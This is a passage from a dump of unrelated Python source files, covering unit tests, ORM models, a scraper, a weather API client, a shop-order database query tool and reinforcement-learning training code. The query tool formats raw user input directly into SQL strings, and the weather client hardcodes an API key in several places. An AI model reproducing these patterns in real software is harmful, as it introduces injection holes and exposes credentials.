[5]]\n actual = list(split_list(items=inp, splits=splits))\n self.assertEqual(expected, actual)\n\n def test_empty_splits_arg(self):\n \"\"\"Test if split_list() works with empty splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [inp]\n actual = list(split_list(items=inp, splits=[]))\n self.assertEqual(expected, actual)\n\n def test_n_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for n_splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n\n expected = [[1, 2, 3, 4, 5]]\n actual = list(split_list(items=inp, n_splits=1))\n self.assertEqual(expected, actual)\n\n expected = [[1, 2, 3], [4, 5]]\n actual = list(split_list(items=inp, n_splits=2))\n self.assertEqual(expected, actual)\n\n expected = [[1, 2], [3, 4], [5]]\n actual = list(split_list(items=inp, n_splits=3))\n self.assertEqual(expected, actual)\n\n inp = list(range(100))\n for n_splits in range(1, 10):\n # Check that there are exactly n splits\n actual = list(split_list(items=inp, n_splits=n_splits))\n self.assertEqual(n_splits, len(actual))\n # Check that splits are of expected equal size\n expected_size = len(actual[0])\n for split in actual[1:-1]:\n self.assertEqual(expected_size, len(split))\n\n def test_zero_n_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for n_splits=0\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [[1, 2, 3, 4, 5]]\n actual = list(split_list(items=inp, n_splits=1))\n self.assertEqual(expected, actual)\n\n def test_split_size_arg(self):\n \"\"\"Test if split_list() returns expected output for split_size arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [[1, 2], [3, 4], [5]]\n actual = list(split_list(items=inp, split_size=2))\n self.assertEqual(expected, actual)\n\n inp = list(range(100))\n for split_size in range(1, 10):\n # Check that each split is of expected size\n actual = list(split_list(items=inp, split_size=split_size))\n for split in actual[:-1]:\n self.assertEqual(split_size, len(split))\n\n def test_empty_input(self):\n \"\"\"Test if split_list() works with empty list as input\"\"\"\n expected = [[]]\n actual = list(split_list(items=[], n_splits=10))\n self.assertEqual(expected, actual)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"561896906","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'virtual'\n\nfrom schema import *\nfrom .persons import Persons\n\n\nclass PersonInfos(Base):\n __tablename__ = 'person_infos'\n\n __table_args__ = {'extend_existing': True, 'schema':'core', }\n\n id = Column(Integer, primary_key=True)\n first_name = Column(String)\n second_name = Column(String)\n last_name = Column(String)\n person_id = Column(Integer, ForeignKey(\"core.persons.id\"))\n #service_type = Column(Integer)\n #service_sub_type = Column(Integer)\n\n person = relation(Persons, primaryjoin=(person_id == Persons.id), backref='info')\n\n def __repr__(self):\n return (\"[%d] %s %s %s\" % (self.id, self.first_name, self.second_name, self.last_name, )).encode('utf-8')\n","sub_path":"addons/onyma/schema/smart/core/person_infos.py","file_name":"person_infos.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"568865830","text":"import os\nfrom email.generator import Generator\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\nclass 
EmailTemplate:\n def __init__(self, records):\n self.records = records\n self.generate()\n\n def generate(self):\n html = \"\"\"\n <html>\n <head></head>\n <body>\n <div>\n hello world\n </div>\n </body>\n </html>
\n \n \n \"\"\"\n part = MIMEText(html, 'html')\n\n msg = MIMEMultipart('alternative')\n # msg['Subject'] = ''\n # msg['From'] = ''\n # msg['To'] = ''\n msg.attach(part)\n\n cwd = os.getcwd()\n file = os.path.join(cwd, 'message.eml')\n\n with open(file, 'w') as f:\n gen = Generator(f)\n gen.flatten(msg)\n","sub_path":"template_generator.py","file_name":"template_generator.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"181246831","text":"import re\n\nimport pytest\n\nimport pytest_ordering\nfrom . import numbers, words, words_backwards, grouping, marked_classes\n\n\n@pytest.mark.parametrize('module', [\n numbers, words, words_backwards, grouping, marked_classes\n])\ndef test_ordered_tests(module, testdir):\n items = testdir.getitems(module)\n ordered_tests = list(pytest_ordering._order_tests(items))\n ordered_letters = [item.name[-1] for item in ordered_tests]\n assert ordered_letters == list(module.ordering)\n\n\ndef test_run_marker_registered(capsys):\n pytest.main('--markers')\n out, err = capsys.readouterr()\n assert '@pytest.mark.run' in out\n\n\ndef test_version():\n assert hasattr(pytest_ordering, '__version__')\n assert re.match(r'[0-9]+\\.[0-9]+(\\.[0-9]+)?$', pytest_ordering.__version__)\n","sub_path":"tests/test_ordering.py","file_name":"test_ordering.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"151253252","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport shutil\nfrom urllib.parse import quote_plus\n\nfrom fedoidc import test_utils\n\nimport fo_conf\n\nKEYDEFS = [\n {\"type\": \"RSA\", \"key\": '', \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]}\n]\n\nTOOL_ISS = 'https://localhost'\n\n# Clear out old stuff\nfor d in ['mds', 'ms']:\n if os.path.isdir(d):\n shutil.rmtree(d)\n\nliss = list(fo_conf.FO.values())\nliss.extend(list(fo_conf.OA.values()))\n\nsigners, keybundle = test_utils.setup(\n KEYDEFS, TOOL_ISS, liss, ms_path=fo_conf.MS_PATH, csms_def=fo_conf.SMS_DEF,\n mds_dir=fo_conf.MDS_DIR, base_url=fo_conf.BASE_URL)\n\nexp = 'jwks_bundle'\nif not os.path.isdir(exp):\n os.mkdir(exp)\nos.chdir(exp)\nfor iss, kj in keybundle.items():\n fn = quote_plus(iss)\n fp = open(fn, 'w')\n fp.write(json.dumps(kj.export_jwks(issuer=iss)))\n fp.close()\nos.rmdir('fo_jwks')\nos.chdir('..')","sub_path":"example/fed_setup.py","file_name":"fed_setup.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"27971762","text":"from queue import PriorityQueue\n\ndef solve():\n arr = list(map(int,input().split()))\n ans = 0\n pq = PriorityQueue()\n\n for i in arr:\n pq.put(i)\n\n while pq.qsize()>1:\n s = pq.get() + pq.get()\n ans+=s\n pq.put(s)\n\n print(ans)\n\nif __name__ == '__main__':\n solve()","sub_path":"DsAlgo/BuffToTest/NoiThanhKimLoai.py","file_name":"NoiThanhKimLoai.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"94811655","text":"\"\"\"\nTests for nuke_filewalker.FileIndexer\n\"\"\"\n\nimport unittest\n\nfrom nukefilewalker.indexer import FileIndexer\n\n\nclass IndexerTestCase(unittest.TestCase):\n \"\"\"\n Tests for nuke_filewalker.FileIndexer\n \"\"\"\n def setUp(self):\n self.indexer = FileIndexer(['tests/testfile1.txt', 'tests/testfile2.txt'])\n\n 
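 # An extra illustrative check, not part of the original suite: it assumes only what the\n # fixtures above already demonstrate, namely that tokenize() lower-cases its input\n # and splits it into word tokens.\n def test_tokenize_lowercases(self):\n tokens = self.indexer.tokenize(\"Rap God RAP god\")\n self.assertEqual(len(tokens), 4)\n self.assertTrue(all(token == token.lower() for token in tokens))\n\n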
def test_tokenize(self):\n \"\"\"\n FileIndexer.tokenize should tokenize a blob of text into words.\n \"\"\"\n with open('tests/testfile1.txt') as fp:\n blob = fp.read()\n self.assertEqual(self.indexer.tokenize(blob), [\n 'i', 'am', 'beginning', 'to', 'feel', 'like', 'a', 'rap',\n 'god', 'rap', 'god', 'all', 'my', 'people', 'from', 'the',\n 'front', 'to', 'the', 'back', 'nod', 'back', 'nod', 'now',\n 'who', 'thinks', 'their', 'arms', 'are', 'long', 'enough',\n 'to', 'slap', 'box', 'slap', 'box', 'they', 'said', 'i',\n 'rap', 'like', 'a', 'robot', 'so', 'call', 'me', 'rap', 'bot'\n ])\n\n def test_start_indexing(self):\n \"\"\"\n FileIndexer.start_indexing should index multiple files and store all\n the words in a list.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.words, [\n 'i', 'am', 'beginning', 'to', 'feel', 'like', 'a', 'rap',\n 'god', 'rap', 'god', 'all', 'my', 'people', 'from', 'the',\n 'front', 'to', 'the', 'back', 'nod', 'back', 'nod', 'now',\n 'who', 'thinks', 'their', 'arms', 'are', 'long', 'enough',\n 'to', 'slap', 'box', 'slap', 'box', 'they', 'said', 'i',\n 'rap', 'like', 'a', 'robot', 'so', 'call', 'me', 'rap', 'bot',\n 'i', 'am', 'a', 'space', 'bound', 'rocket', 'ship', 'and',\n 'your', 'heart', 'is', 'the', 'moon', 'and', 'i', 'am', 'aiming',\n 'right', 'at', 'you', 'right', 'at', 'you', 'two', 'hundred',\n 'fifty', 'thousand', 'miles', 'on', 'a', 'clear', 'night', 'in',\n 'june', 'and', 'i', 'am', 'aiming', 'right', 'at', 'you',\n 'right', 'at', 'you', 'right', 'at', 'you'\n ])\n\n def test_most_encountered_words_default_count(self):\n \"\"\"\n FileIndexer.most_encountered_words called without a parameter\n should return the top 10 most common words across all the files\n being indexed.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.most_encountered_words(), [\n ('right', 5), ('you', 5), ('i', 5), ('at', 5), ('am', 4),\n ('rap', 4), ('a', 4), ('and', 3), ('to', 3), ('the', 3),\n ])\n\n def test_most_encountered_words_new_count(self):\n \"\"\"\n FileIndexer.most_encountered_words should return the specified\n number of most common words when called with a parameter for\n count.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.most_encountered_words(5), [\n ('right', 5), ('you', 5), ('i', 5), ('at', 5), ('am', 4)\n ])\n\n def test_most_encountered_words_longer_text_blob(self):\n \"\"\"\n Test FileIndexer.most_encountered_words with a longer text blob\n \"\"\"\n indexer = FileIndexer(['tests/a_dark_brown_dog'])\n indexer.start_indexing()\n self.assertEqual(indexer.most_encountered_words(5), [\n ('the', 212), ('a', 88), ('and', 83), ('he', 80),\n ('his', 69)\n ])\n","sub_path":"tests/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312848610","text":"# coding = utf-8\n\nimport pymysql\nimport configparser\nfrom urllib.parse import quote_plus\nimport pymongo\nimport sys\nimport time\nimport json\n\n\nconf = configparser.ConfigParser()\nconf.read(\"E:\\\\binworks\\\\HEYTEA_TEST\\\\common\\\\myconfig.ini\", encoding='utf-8')\nkeyword = str(input(\"多关键字查询(条件空格分割,模糊匹配)\\n例如1:海岸城,8002 通知骑手;例如2:海上世界 估清波波茶:\"))\n\n\ndef get_keywords(keyword):\n input_massage = {'shop_name': None, 'pickup': None, 'operation': None, 'NO': None}\n keywords = keyword.split()\n lens = len(keywords)\n for i in range(lens):\n if i == 0:\n if keywords[i].isdigit() and len(keywords[i]) > 4:\n 
input_massage['NO'] = keywords[i]\n else:\n input_massage['shop_name'] = keywords[i]\n elif i == 1:\n if keywords[i].isdigit():\n input_massage['pickup'] = keywords[i]\n else:\n input_massage['operation'] = keywords[i]\n elif i == 2:\n input_massage['operation'] = keywords[i]\n return input_massage\n\n\ndef get_sql():\n sql_dict = {\"mysql\": None, \"mongo\": {\"operation\": None}}\n sqls = get_keywords(keyword=keyword)\n if sqls[\"NO\"] is not None:\n sql_NO = \"SELECT * FROM orders WHERE `no` = '%s'\" % sqls[\"NO\"]\n sql_dict[\"mysql\"] = sql_NO\n if sqls[\"operation\"] is not None:\n sql_dict[\"mongo\"][\"operation\"] = sqls[\"operation\"]\n\n elif sqls[\"shop_name\"] is not None and sqls[\"pickup\"] is None:\n sql_shop = \"SELECT id, `no`, code, `name`,city FROM shops where `name` LIKE '%%%s%%'\" % sqls[\"shop_name\"]\n sql_dict[\"mysql\"] = sql_shop\n if sqls[\"operation\"] is not None:\n sql_dict[\"mongo\"][\"operation\"] = sqls[\"operation\"]\n sql_dict[\"mongo\"][\"name\"] = sqls[\"shop_name\"]\n\n elif sqls[\"shop_name\"] is not None and sqls[\"pickup\"] is not None:\n sql_order = \"SELECT shops.`name`,orders.* FROM orders LEFT JOIN shops ON orders.shop_id = shops.id WHERE\" \\\n \" orders.pickup_no = '%s' AND shops.`name` LIKE '%%%s%%' ORDER BY orders.id DESC LIMIT 10\" \\\n % (sqls[\"pickup\"], sqls[\"shop_name\"])\n sql_dict[\"mysql\"] = sql_order\n if sqls[\"shop_name\"] is not None: pass\n\n return sql_dict\n\n\ndef get_sql_sets():\n sqls = get_keywords(keyword=keyword)\n sql_NO = \"SELECT * FROM orders WHERE `no` = '%s'\" % sqls[\"NO\"]\n sql_shop = \"SELECT id, `no`, code, `name`,city FROM shops where `name` LIKE '%%%s%%'\" % sqls[\"shop_name\"]\n sql_order = \"SELECT shops.`name`,orders.* FROM orders LEFT JOIN shops ON orders.shop_id = shops.id WHERE \" \\\n \"orders.pickup_no = '%s' AND shops.`name` LIKE '%%%s%%' ORDER BY orders.id DESC LIMIT 10\" \\\n % (sqls[\"pickup\"], sqls[\"shop_name\"])\n mongo_NO = {'order_no': sqls[\"NO\"]}\n\n\ndef select_db():\n # Build the SQL statement from the parsed keyword input.\n sql_dict = get_sql()\n myconfig = pymysql.connect(host=conf.get(\"MySql\", \"mysql_host\"),\n port=int(conf.get(\"MySql\", \"mysql_port\")),\n user=conf.get(\"MySql\", \"mysql_username\"),\n passwd=conf.get(\"MySql\", \"mysql_password\"),\n db=conf.get(\"MySql\", \"db_name\"),\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor\n )\n cursor = myconfig.cursor()\n cursor.execute(sql_dict[\"mysql\"])\n data = cursor.fetchall()\n if not data:\n return dict(code=99, data=data) # empty result\n else:\n return dict(code=0, data=data)\n\n\n# def select_mongodb():\n# mongo_host = conf.get('mongodb', 'mongo_host')\n# mongo_database = conf.get('mongodb', 'database')\n# mongo_username = conf.get('mongodb', 'username')\n# mongo_password = conf.get('mongodb', 'password')\n# uri = \"mongodb://%s:%s@%s/%s?authMechanism=SCRAM-SHA-1\" % (\n# quote_plus(mongo_username), quote_plus(mongo_password), quote_plus(mongo_host), mongo_database)\n# client = pymongo.MongoClient(uri)\n# # print(client.database_names())\n# set = client[\"heyteago\"][conf.get(\"mongodb\", \"shop\")]\n# # sets = {'shop_id': 97, 'operate_code': 9, 'operate_detail': {'$regex': '冷萃知秋'}}\n# sets = {'shop_id': 109, 'operate_detail': {'$regex': '755030201811301339248227'}}\n# data = set.find(dict(sets)).limit(3).sort('_id', pymongo.DESCENDING)\n# client.close()\n# for i in data:\n# print(i)\n\n\n# select_mongodb()\n# db = select_db()[\"code\"]\n# if db == 0:\n# for data in select_db()[\"data\"]:\n# print(data,)\n# elif db == 99:\n# 
print(\"查询为空\")\n\n","sub_path":"common/select_db.py","file_name":"select_db.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145553534","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nimport string\nimport random\n\nclass UserProduct(models.Model):\n user = models.ForeignKey(User)\n product = models.ForeignKey('Product')\n is_visible = models.BooleanField(default=True)\n is_wishlist = models.BooleanField(default=True)\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\nclass Product(models.Model):\n title = models.TextField()\n is_available = models.BooleanField(default=True)\n is_visible = models.BooleanField(default=True)\n # is_wishlist = models.BooleanField(default=True)\n price = models.FloatField(default=0)\n special_price = models.FloatField(default=0)\n # promotion_discount = models.FloatField(default=0)\n # quantity = models.IntegerField(default=0)\n # available_quantity = models.IntegerField(default=0)\n cateory = models.ForeignKey(\"Product__Category\")\n hashtag = models.CharField(max_length=255, null=True, blank=True)\n image = models.ImageField(upload_to='static/media/images/', null=True, blank=True)\n promotion_code = models.CharField(max_length=255, null=True, blank=True)\n scan_code = models.CharField(max_length=255, null=True, blank=True)\n featured = models.BooleanField(default=False)\n\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\nclass Product__Category(models.Model):\n name = models.CharField(max_length=255, null=True, blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n\n# def create__product(sender, instance, created, **kwargs):\n# if created:\n# instance.bar_code = id_generator()\n# instance.save()\n# post_save.connect(create__product, sender=Product)\n#\n# def id_generator(size=20, chars=string.ascii_uppercase + string.digits):\n# return ''.join(random.choice(chars) for _ in range(size))","sub_path":"sr_api__products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"116425000","text":"import requests\nimport ast\n\napi_key = \"kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\"\n\n\nclass Weatherplz():\n def __init__(self, key=api_key, location=None):\n self.key = key\n self.headers = {\n 'x-rapidapi-host': \"dataservice.accuweather.com\",\n 'x-rapidapi-key': \"kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\",\n 'content-type': \"application/x-www-form-urlencoded\"\n }\n self.location = location\n self.url = \"http://dataservice.accuweather.com/locations/v1/search\"\n self.current = self.get_current()\n #def get_key(self):\n # r = requests.get(self.url, params=self.headers,\n # headers=self.headers)\n # print(r)\n #print(r.text)\n #print(r.headers)\n\n\n def get_key(self):\n locstring = self.location.replace(\" \", \"%20\")\n r = requests.post(\"http://dataservice.accuweather.com/locations/v1/sear\"\n \"ch?apikey=kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM&q=\"\n \"{}&language=en-uk&details=true&offset=1\"\n .format(locstring))\n loc_key = r.json()[0].get(\"Key\")\n\n print(\"url: \" + str(r.url))\n print(\"headers: \" + 
str(r.headers))\n print(\"r.text: \" + str(r.text))\n print(type(r.json()))\n print(str(loc_key))\n return loc_key\n\n def get_current(self):\n r = requests.get(\"http://dataservice.accuweather.com\"\n \"/currentconditions/v1/{}?\"\n \"apikey=kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\"\n \"&language=en-us&details=true\"\n .format(self.get_key()))\n print(r.url)\n return r.json()[0]","sub_path":"venv/accuweatherapi.py","file_name":"accuweatherapi.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"373205460","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport datetime\nfrom multiprocessing import Pool\n\n# План:\n# 1) Мы создадим однопоточный парсер\n# 2) Замерим время\n# 3) После мы создадим многопоточный парсер в котором\n# будем использовать библиотеку multiproccesing и будем\n# работать с классом Pool\n# 4) Дальше замерим время\n# 5) И экспортируем полученный данные в формат csv .\n\ndef get_html(url):\n r = requests.get(url)\n return r.text\n\ndef get_all_links(html):\n soup = BeautifulSoup(html, 'html.parser')\n tds = soup.find('table', class_='table').find_all('td')\n links = []\n for td in tds:\n a = td.find('a').get('href')\n link = 'http://www.kenesh.kg' + a\n if link not in links and 'fraction' not in link:\n links.append(link)\n return links\n\ndef get_page_data(html):\n soup = BeautifulSoup(html, 'html.parser')\n try:\n name = soup.find('h3', class_='deputy-name').text.strip()\n except:\n name = \"neto\"\n try:\n number = soup.find(\"p\", class_='mb-10').text.strip()\n except:\n number = \"neto\"\n try:\n bio = soup.find('div', id='biography').text.strip()\n except:\n bio = 'neto'\n data = {\"name\": name, \"number\": number, \"bio\": bio}\n return data\n\ndef write_csv(data):\n with open('deputy.csv','a') as file:\n writer = csv.writer(file)\n writer.writerow((data['name'], data['number'], data['bio'])) # Здесь записывает в файл csv\n print(data['name'], '\\n', data['number'], '\\n', data['bio'],'parsed') # Здесь просто принтит в терминал\n\ndef make_all(url):\n html = get_html(url)\n data = get_page_data(html)\n write_csv(data)\n\ndef main():\n start = datetime.datetime.now()\n url = 'http://kenesh.kg/ky/deputy/list/35'\n all_links = get_all_links(get_html(url))\n with Pool(40)as p:\n p.map(make_all, all_links)\n end = datetime.datetime.now()\n result = end - start\n print(str(result))\n\nif __name__ == \"__main__\": # точка входа\n main()\n","sub_path":"parsing_kenesh_s_multiprocessing.py","file_name":"parsing_kenesh_s_multiprocessing.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"527460630","text":"import configparser\n\nclass Config:\n def read_config(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n APP_ID = config['config']['APP_ID']\n API_KEY = config['config']['API_KEY']\n SECRET_KEY = config['config']['SECRET_KEY']\n return [APP_ID,API_KEY,SECRET_KEY]","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"147769424","text":"import os\nfrom ActorCriticModel import *\nfrom Agent import Agent\nfrom torch.multiprocessing import Process, Pipe, Lock\nfrom visdom import Visdom\nfrom SharedOptim import SharedRMSprop\nimport numpy as np\n\nif __name__ == '__main__':\n os.environ[\"OMP_NUM_THREADS\"] = 
\"1\"\n\n vis = Visdom()\n reward_layout = dict(title=\"Episode rewards\", xaxis={'title': 'episode'}, yaxis={'title': 'reward'})\n policy_layout = dict(title=\"Policy loss\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'loss'})\n value_layout = dict(title=\"Value loss\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'loss'})\n entropy_layout = dict(title=\"Entropies\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'entropy'})\n\n MAX_EPISODES = 20000\n MAX_ACTIONS = 50000\n DISCOUNT_FACTOR = 0.99\n STEPS = 20\n\n GlobalModel = ActorCriticModel_Breakout()\n GlobalModel.share_memory()\n\n Optimizer = None\n #Optimizer = SharedRMSprop(GlobalModel.parameters(), lr=0.0007, eps=0.1, alpha=0.99, momentum=0.0)\n CriticOptimizer = SharedRMSprop(GlobalModel.getCriticParameters(), lr=0.00035, alpha=0.99, eps=0.1, momentum=0.0)\n ActorOptimizer = SharedRMSprop(GlobalModel.getActorParameters(), lr=0.0007, alpha=0.99, eps=0.1, momentum=0.0)\n #Optimizer.share_memory()\n CriticOptimizer.share_memory()\n ActorOptimizer.share_memory()\n\n lock = Lock()\n\n num_cpu = 4\n agents = []\n for cpu in range(num_cpu):\n agents.append(Agent(cpu))\n\n receiver, sender = Pipe()\n\n agent_threads = []\n for agent in agents:\n thread = Process(target=agent.letsgo, args=(GlobalModel, CriticOptimizer, ActorOptimizer, lock, sender,\n MAX_EPISODES, MAX_ACTIONS, DISCOUNT_FACTOR, STEPS, Optimizer,))\n thread.start()\n agent_threads.append(thread)\n\n dones = [False for _ in range(num_cpu)]\n\n NSTEPITER = []\n VALUELOSS = []\n VALUELOSS_MEAN = []\n valueloss_sample = []\n POLICYLOSS = []\n POLICYLOSS_MEAN = []\n policyloss_sample = []\n ENTROPY = []\n ENTROPY_MEAN = []\n entropy_sample = []\n\n EPISODES = []\n REWARDS = []\n REWARDS_MEAN = []\n reward_sample = []\n\n while True:\n (cpu, is_nstep, value_loss, policy_loss, entropy, reward, complete) = receiver.recv()\n\n dones[cpu] = complete\n\n exit = True\n for d in dones:\n if d == False:\n exit = False\n break\n if exit:\n break\n\n if complete:\n continue\n\n if is_nstep:\n\n valueloss_sample.append(value_loss)\n policyloss_sample.append(policy_loss)\n entropy_sample.append(float(entropy))\n\n if len(valueloss_sample) == 100:\n NSTEPITER.append(len(NSTEPITER) + 1)\n VALUELOSS.append(np.mean(valueloss_sample))\n POLICYLOSS.append(np.mean(policyloss_sample))\n ENTROPY.append(np.mean(entropy_sample))\n valueloss_sample = []\n policyloss_sample = []\n entropy_sample = []\n\n if len(NSTEPITER) % 10 == 0:\n VALUELOSS_MEAN.append(np.mean(VALUELOSS[len(VALUELOSS) - 10:]))\n POLICYLOSS_MEAN.append(np.mean(POLICYLOSS[len(POLICYLOSS) - 10:]))\n ENTROPY_MEAN.append(np.mean(ENTROPY[len(ENTROPY) - 10:]))\n\n trace_value = dict(x=NSTEPITER, y=VALUELOSS, type='custom', mode=\"lines\", name='loss')\n trace_policy = dict(x=NSTEPITER, y=POLICYLOSS, type='custom', mode=\"lines\", name='loss')\n trace_entropy = dict(x=NSTEPITER, y=ENTROPY, type='custom', mode=\"lines\", name='entropy')\n\n trace_value_mean = dict(x=NSTEPITER[::10], y=VALUELOSS_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean loss')\n trace_policy_mean = dict(x=NSTEPITER[::10], y=POLICYLOSS_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean loss')\n trace_entropy_mean = dict(x=NSTEPITER[::10], y=ENTROPY_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean entropy')\n\n vis._send({'data': [trace_value, trace_value_mean], 'layout': value_layout, 'win': 'valuewin'})\n vis._send({'data': [trace_policy, 
trace_policy_mean], 'layout': policy_layout, 'win': 'policywin'})\n vis._send({'data': [trace_entropy, trace_entropy_mean], 'layout': entropy_layout, 'win': 'entropywin'})\n\n else:\n\n reward_sample.append(reward)\n if(len(reward_sample) == 10):\n EPISODES.append(len(EPISODES) + 1)\n REWARDS.append(np.mean(reward_sample))\n reward_sample = []\n\n if len(EPISODES) % 10 == 0:\n REWARDS_MEAN.append(np.mean(REWARDS[len(REWARDS) - 10:]))\n\n trace_reward = dict(x=EPISODES, y=REWARDS, type='custom', mode=\"lines\", name='reward')\n trace_reward_mean = dict(x=EPISODES[::10], y=REWARDS_MEAN,\n line={'color': 'red', 'width': 4}, type='custom', mode=\"lines\", name='mean reward')\n\n vis._send({'data': [trace_reward, trace_reward_mean], 'layout': reward_layout, 'win': 'rewardwin'})\n\n if len(EPISODES) % 50 == 0:\n print(\"Saved\")\n torch.save(GlobalModel.state_dict(), 'trainModels_Breakout/episodes_' + str(len(EPISODES)) + '.pt')\n\n for thread in agent_threads:\n thread.join()\n\n","sub_path":"nstepTD_A3C_SpaceInvaders/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30237402","text":"#insert a node at the head of linked list\n\n#hackerrank : https://www.hackerrank.com/challenges/insert-a-node-at-the-head-of-a-linked-list/problem\n\n#python code :\n\ndef insertNodeAtHead(llist, data):\n # Write your code here\n node=SinglyLinkedListNode(data)\n node.next=llist\n llist=node\n return llist\n","sub_path":"Insert at head.py","file_name":"Insert at head.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296523066","text":"from unittest import TestCase, mock\n\nfrom invoke.runner import Result\n\nfrom semantic_release.git_helpers import commit_new_version, get_commit_log\n\n\nclass GetCommitLogTest(TestCase):\n def test_first_commit_is_not_initial_commit(self):\n self.assertNotEqual(next(get_commit_log()), 'Initial commit')\n\n\nclass CommitNewVersionTests(TestCase):\n @mock.patch('semantic_release.git_helpers.run',\n return_value=Result(stdout='', stderr='', pty='', exited=0))\n def test_add_and_commit(self, mock_run):\n commit_new_version('1.0.0')\n self.assertEqual(\n mock_run.call_args_list,\n [mock.call('git add semantic_release/__init__.py', hide=True),\n mock.call('git commit -m \"1.0.0\"', hide=True)]\n )\n","sub_path":"tests/test_git_helpers.py","file_name":"test_git_helpers.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"439291497","text":"import random\n\nif __name__ == '__main__':\n\ttrain = []\n\tlabel = []\n\twith open('hw2.1_corpus.txt', 'r', encoding='utf-8') as f:\n\t\tlines = f.read().split('\\n')\n\t\tlines.remove('')\n\t\tfor l in range(len(lines[:-1])):\n\t\t\tif len(lines[l]) > 26 or len(lines[l+1]) > 26:\n\t\t\t\tcontinue\n\t\t\ttmpT = ''\n\t\t\tfor w in lines[l]:\n\t\t\t\ttmpT += ' ' + w\n\t\t\ttmpT += ' '\n\t\t\tidx = random.randint(1, len(lines[l+1]))\n\n\t\t\tif random.random()>0.2 and len(lines[l]) <= 24:\n\t\t\t\tidx2 = random.randint(1, len(lines[l+1]))\n\t\t\t\tif idx2\t!=\tidx:\n\t\t\t\t\tif idx2 > idx:\n\t\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx2-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + 
